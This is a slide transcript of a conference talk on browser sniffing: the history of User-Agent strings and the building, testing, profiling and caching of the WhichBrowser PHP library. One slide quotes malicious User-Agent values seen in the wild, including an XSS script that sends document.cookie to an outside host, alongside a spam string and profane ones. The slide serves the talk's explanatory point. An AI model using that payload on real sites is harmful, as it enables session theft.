A presentation at PHP Zwolle in in Zwolle, Netherlands by Niels Leenheer
everybody lies PHP Zwolle, October 26th 2016
1 Browser sniffing explained
why a talk about browser sniffing?
browser sniffing is dirty
you should use feature detection
why a talk about browser sniffing?
what is browser sniffing?
The HTTP specification defines the User-Agent header. It contains a string with information about the browser.
Every request the browser makes to the server includes the User-Agent header
GET http://whichbrowser.net/ HTTP/1.1 Accept: text/html, application/xhtml+xml, / Accept-Language: en-us User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: whichbrowser.net
GET http://whichbrowser.net/ HTTP/1.1 Accept: text/html, application/xhtml+xml, / Accept-Language: en-us User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: whichbrowser.net HTTP/1.1 200 OK Date: Mon, 08 Feb 2016 10:40:28 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16 Last-Modified: Thu, 15 Jan 2015 10:10:40 GMT ETag: "984-50cae11796432" Accept-Ranges: bytes Content-Length: 2436 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 <!doctype html> <html>
You can use the User-Agent string to identify: the browser the rendering engine the operating system the device model and more
what is browser sniffing good for?
improve ux if you know the platform or browser, you can streamline the user experience
analytics if you know your users, you can build a better site for them
error logging if you know which browser is causing problems, you can fix them
why is browser sniffing hard?
things started out simple
Mosaic Mosaic/0.9 The name of the browser The version of the browser
Netscape Navigator Mozilla/1.0 (Win3.1) The code name of the browser The version of the browser Operating system
but it quickly started to get complicated
Internet Explorer Mozilla/1.0 (compatible; MSIE 1.0; Windows 95) The name of the browser Compatible with Netscape Navigator 1.0 The version of the browser Operating system
Opera Opera/8.54 (Windows 95; U; en) The name of the browser The version of the browser Operating system English language United States level encryption
Opera Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0 The name of the browser The version of the browser Rendering engine
Opera Opera/9.8 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.10 The name of the browser Fake version of the browser Real version of the browser
Firefox Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1) Gecko/20090624 Firefox/3.5 The name of the rendering engine Build date of the rendering engine The name of the browser Version of the browser Version of the rendering engine
Firefox Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Build date is no longer updated
Firefox Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/16.0 Firefox/16.0
and it gets worse…
Safari Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3 The name of the browser Version of the browser
Chrome Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/525.28.3 The name of the browser Version of the browser
Opera Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.180 The name of the browser Version of the browser
Internet Explorer Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko Version of the browser
Edge Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/525.28.3 Edge/12.10162 The name of the browser Version of the browser
and those were all relatively normal User-Agent strings
“User-Agent strings only get larger over time, never smaller” Niels’s law of User-Agent strings
Samsung Internet Mozilla/5.0 (Linux; Android 4.3; en; SAMSUNG GT-I9505 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/ 28.0.1500.94 Mobile Safari/537.36 Samsung device Version of the browser
Nokia Xpress for Windows Phone Mozilla/5.0 (Series40; NOKIALumia800; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.8.0.50.5
Sometimes browsers include a compatibility mode, or desktop mode which deliberately changes the User-Agent string
Opera Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50 The name of the browser The name of the operating system Version of the browser
Opera Mobile (desktop mode) Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50 The name of the browser ROT 13 encrypted “mobi“ Version of the browser
Internet Explorer Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0) Browser version
Internet Explorer (compatibility view) Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0) Trident 5 means it’s Internet Explorer 9
Sometimes browsers are just weird
Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2 Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
Vehicle Center Console Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2 Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
Mozilla/4.0 (MobilePhone PLS6600KJ/US/1.0) NetFront/3.1 MMP/2.0
Mozilla/4.08 (PDA; SL-C3000/1.0,Qtopia/1.5.2) NetFront/3.1
Mozilla/5.0 (DTV; TVwithVideoPlayer) NetFront/4.1 AQUOSBrowser/1.0 InettvBrowser/2.2 (08001F;DTV06VSFC;0009;0001)
Mozilla/5.0 (Standard; NF41SW/1.1; like Gecko; TASKalfa 406ci) NetFront/4.1
Mozilla/4.0 (PSP (PlayStation Portable); 2.60)
Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2
? Mozilla/5.0 (DAG; 1.4; like Gecko) NetFront/4.2
Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2 Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en] Opera Bork-edition?
BORK BORK BORK
And it is possible to change the User-Agent string yourself
spam http://www.sexxlife.it/sexyshop (sexy shop - sexy toys, BDSM, vibratori, falli, vagine, lubrificanti, dvd porno, film hard, lingerie - Migliaia di articoli nel nostro sexy shop online.; http://www.sexxlife.it; info@sexxlife.it)
XSS attacks
<script>alert("My Little Pony”);</script> <script language="JavaScript">document.location= "http://www.max1094.18.lc/admin/cookies.php?c=" + document.cookie;</script> <img src="http://bravo.trollab.org/mylittlepony.png" alt="My Little Pony”>XSS attacks
funny people Mozilla/10.0 (compatible; MSIE 10.0; CP/M; 8-bit) Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Microsoft; Surface Zune Phone XL) AppleWebKit/537.36 (KHTML, like Gecko) (╯°□°)╯︵ ┻━┻
angry people
angry people FuckZilla/666.0 (Gavnoid; Debile; rv:123.0) FuckYou/123.0 FuckingFox/321.0 Opera/9.80 (Windows NT 6.1; U; FuckYou; xx) Presto/2.10.229 Version/11.62 Seriously, Go fuck yourself W3C standards are important. Stop fucking obsessing over user-agent already.
User-Agent strings cannot be trusted!
Everybody lies
you should never use browser sniffing for controlling access to your website
you should never use browser sniffing for determining browser capabilities
you should never build your own browser sniffing library
2 Creating my own browser sniffing library
open source
PHP 5.4 and up including PHP 7 and HHVM
12.500 lines of code
100% code coverage 5000+ individual tests
device database with 36.000 entries
psr-1 and psr-2 coding style
psr-4 autoloading
psr-6 caching interface
1 How to maintain quality?
testing of course!
What tools do we use?
PHP CodeSniffer
PHP CodeSniffer Check if your code follows coding standards
PHPUnit
PHPUnit Very good for testing the code that defines the public apis
PHPUnit But not so good for testing the actual browser detection
Testrunner
Testrunner Very lean framework for testing browser sniffing
Testrunner YAML files that contain a list of user agent strings and the expected results
Testrunner No coding required Just add a new user agent string and automatically generate the expected results
Continuous integration?
Yes, please!
Automatically start up virtual machines that run your whole test suite after every commit
Automatic testing of your code in multiple versions of PHP
Automatic checking of pull requests with feedback directly in Github
.travis.yml language: php php: - 5.4 - 5.5 - 5.6 - 7.0 - hhvm before_script: - composer self-update - composer update --ignore-platform-reqs --prefer-source script: - vendor/bin/phpcs --standard=PSR1,PSR2 -n src - php bin/runner.php --coverage --show check - vendor/bin/phpunit --coverage-clover phpunit.xml after_script: - travis_retry php vendor/bin/coveralls -v
Check if your tests cover all of your source code
Coverage information is generated by PHPUnit and Testrunner
Generating code coverage
Requires Xdebug or phpdbg
Common format is Clover XML
PHPUnit supports generating coverage as Clover XML phpunit --coverage-clover phpunit.xml
For testrunner we need to convert raw Xdebug or phpdbg coverage data to Clover XML
There is a package for that! phpunit/php-code-coverage composer require phpunit/php-code-coverage $coverage = new PHP_CodeCoverage; $coverage->filter()->addDirectoryToWhitelist('src'); $coverage->start('Testrunner'); // run your tests $coverage->stop(); $writer = new PHP_CodeCoverage_Report_Clover; $writer->process($coverage, 'runner.xml');
2 How to make it faster!
profiling of course!
WhichBrowser used to be 4 times slower than it’s competitors
UA Parser Piwik WhichBrowser Wurlf Browscaps average parsing time (ms) source: http://thadafinser.github.io/UserAgentParserComparison/
Why?
Use Xdebug and QCacheGrind
Xdebug has an option to create performance profiles zend_extension="/usr/local/opt/php70-xdebug/xdebug.so" xdebug.profiler_enable=1
View performance profiles in QCacheGrind
65% of time was spend in DeviceModels::identify()
65% of time was spend looking through the device database
65% of time was spend iterating over huge arrays
DeviceModels::$ANDROID_MODELS = [ … 'GT-I92(20|28)!' 'GT-I92(30|35)!' 'GT-I9250' 'GT-I92(60|68)!' 'GT-I9295' 'GT-I93(00|03|05|08)!' 'GT-I93(01)!' 'GT-I95(00|05|07)!' 'GT-I95(02|08)!' 'GT-I95(06)!' … ]; => => => => => => => => => => [ [ [ [ [ [ [ [ [ [ 'Samsung', 'Samsung', 'Samsung', 'Samsung', 'Samsung', 'Samsung', 'Samsung', 'Samsung', 'Samsung', 'Samsung', 'Galaxy 'Galaxy 'Galaxy 'Galaxy 'Galaxy 'Galaxy 'Galaxy 'Galaxy 'Galaxy 'Galaxy Note' ], Golden' ], Nexus' ], Premier' ], S4 Active' ], S III' ], S3 Neo' ], S4' ], S4 Duos' ], S4 Advance' ],
'GT-I93(00|03|05|08)!'
"/^GT-I93(00|03|05|08)/i"
Why not a real database?
Easy editing, easy deployment
Order in the file matters
Why a PHP file?
No need to parse JSON or YAML
The whole database can be cached by the opcode cache
But you do need to iterate over every single item in that array until you have a match
Why not create an index?
You can’t create an index for regular expressions :-(
Or can you?
No, you can’t!
If only we could determine all possible matches for a regular expression…
1 All regular expressions are fixed to the start of the string
2 The shorter the index, the easier it is to find the matching strings
The ideal index length was 2 or 3 characters 1 2 3 4
We can do that!
/^GT-I93(00|03|05|08)/i GT
/^(SHP-)?(SHARP )?SH[0-9]{2,3}/i SH
/^(MEDION|(MD )?LIFETAB)/i ME, MD, LI
/^(Lenovo ?)?(IdeaTab ?)?[KSV][0-9]{4,4}/i LE, ID, K0, K1, K2, K3, K4, K…
/^(Lenovo ?)?(IdeaTab ?)?[KSV][0-9]{4,4}/i LE, ID, “complex list”
Can we do this in PHP?
There is a package for that! icomefromthenet/reverse-regex composer require icomefromthenet/reverse-regex use ReverseRegex\Lexer; $lexer = new Lexer($regexp); $lexer->moveNext(); if ($lexer->isNextTokenAny([ Lexer::T_LITERAL_CHAR,Lexer::T_LITERAL_NUMERIC ])) { … } else if ($lexer->isNextToken(Lexer::T_CHOICE_BAR)) { … } else if ($lexer->isNextToken(Lexer::T_GROUP_OPEN)) { … } else if ($lexer->isNextToken(Lexer::T_GROUP_CLOSE)) { …
Generate keys from a regular expression in just 100 lines of code
DeviceModels::$ANDROID_INDEX = [ … '@HW' => array ( 0 => '(HW-|HUAWEI )?(TIT|TAG)!!', 1 => '(HW-|HUAWEI |HONOR )?(ATH|CHE|CHM|HN3|H30|H60|HOL|KIW|PE|PLK|SCL)!!', 2 => '(HW-|HUAWEI )?(CHC|KII)!!', 3 => '(HW-|HUAWEI )?(ALE|D2|G6|G7|GRA|M100|P2|P6|P7|RIO|SC|Sophia)!!', 4 => '(Huawei|Ascend|HW-)!!', 5 => 'HW-01E', 6 => 'HW-03E', ), … ];
Looking up an android device (without index) 1✕ foreach($data as $item) 15.000 ✕ preg_match($item, $model) $item === $model 1✕ return $item or
Looking up an android device (with index) 1✕ $i = $index[substr(0,2,$model)] 1✕ foreach($i as $item) 1 - 100 ✕ preg_match($item, $model) $item === $model 1✕ return $data[$item] or
UA Parser Piwik Whichbrowser Wurlf Browscaps average parsing time (ms) source: http://thadafinser.github.io/UserAgentParserComparison/
But wait…
Again lists of regular expressions, but with no possible way to create an index
Multiple calls to preg_match with simple regular expressions
if (preg_match('/Nintendo Wii/u', $ua)) { … } if (preg_match('/Nintendo Wii ?U/u', $ua)) { … } if (preg_match('/PlayStation Vita/u', $ua)) { … } if (preg_match('/PlayStation 4/u', $ua)) { … } if (preg_match(‘/Xbox One/u', $ua)) { …
preg_match is fast
But it has a bit of overhead
Replace multiple calls with a single call to reduce overhead
if (preg_match('/Nintendo Wii/u', $ua)) { … } if (preg_match('/Nintendo Wii ?U/u', $ua)) { … } if (preg_match('/PlayStation Vita/u', $ua)) { … } if (preg_match('/PlayStation 4/u', $ua)) { … } if (preg_match(‘/Xbox One/u', $ua)) { …
if (preg_match('/Nintendo Wii/u', $ua)) { … } if (preg_match('/Nintendo Wii ?U/u', $ua)) { … } if (preg_match('/PlayStation Vita/u', $ua)) { … } if (preg_match('/PlayStation 4/u', $ua)) { …
if (!preg_match(‘/(Nintendo|Nitro|PlayStation|PS[0-9]|Sega|Dreamcast|Xbox)/ui’, $ua)) { return; } if (preg_match('/Nintendo Wii/u', $ua)) { … } if (preg_match('/Nintendo Wii ?U/u', $ua)) { … } if (preg_match('/PlayStation Vita/u', $ua)) { … } if (preg_match('/PlayStation 4/u', $ua)) { …
We still do the individual checks, but only if we are certain there is a match
UA Parser Piwik Whichbrowser Wurlf Browscaps average parsing time (ms) source: http://thadafinser.github.io/UserAgentParserComparison/
On par with others, but with a massive device database
3 How to make it even faster
3 How to make it even faster-der!
caching of course!
A common use case of WhichBrowser is call it from all pages of your website
Instead of analysing every page view you can do it once and reuse that result
memcached redis xcache couchbase apc mongodb filesystem zend data cache wincache
An universal caching API
PSR-6
Memcached // Initialise the Memcached client $client = new \Memcached(); $client->addServer('localhost', 11211); // Retrieve our data $data = $client->get($id); if ($client->getResultCode() === Memcached::RES_NOTFOUND) { $data = … $client->set($id, $data); }
Memcached using a PSR-6 cache adapter // Initialise the Memcached client $client = new \Memcached(); $client->addServer('localhost', 11211); // Initialise our storage pool $pool = new \Cache\Adapter\Memcached\MemcachedCachePool($client); // Retrieve our data $item = $pool->getItem($id); if ($item->isHit()) { $data = $item->get()); } else { $data = … $item->set($data); $pool->save($item); }
Redis using a PSR-6 cache adapter // Initialise the Redis client $client = new \Redis(); $client->connect('localhost', 6379); // Initialise our storage pool $pool = new \Cache\Adapter\Redis\RedisCachePool($client); // Retrieve our data $item = $pool->getItem($id); if ($item->isHit()) { $data = $item->get()); } else { $data = … $item->set($data); $pool->save($item); }
Install adapters for the storage method you want
Set up the storage pool and give it to WhichBrowser
WhichBrowser without caching // Analyse the user agent string $result = new WhichBrowser\Parser(); $result->analyse(getallheaders()); echo $result->toString();
WhichBrowser with Memcached caching // Initialise the Memcached client $client = new \Memcached(); $client->addServer('localhost', 11211); // Initialise our storage pool $pool = new \Cache\Adapter\Memcached\MemcachedCachePool($client); // Analyse the user agent string $result = new WhichBrowser\Parser(); $result->setCache($pool); $result->analyse(getallheaders()); echo $result->toString();
Just 50 lines of code
1 Test everthing! 2 Profile everyting! 3 Cache everything!
4 Never, ever create your own browser sniffing library
Thank you!
Thank you!
This is talk about browser sniffing. And yes, I do realise it is 2016. I know browser sniffing is ugly and we should all be using feature detection. But a quick search on Github still shows millions of lines of code referring to user agents strings. So this message clearly hasn’t landed yet. But why is browser sniffing a bad choice? This talk will dive into history and show the origin of the user agent string and the hidden battle between browser makers and web developers. It will show its simple beginnings and the horrible monstrosity it has become.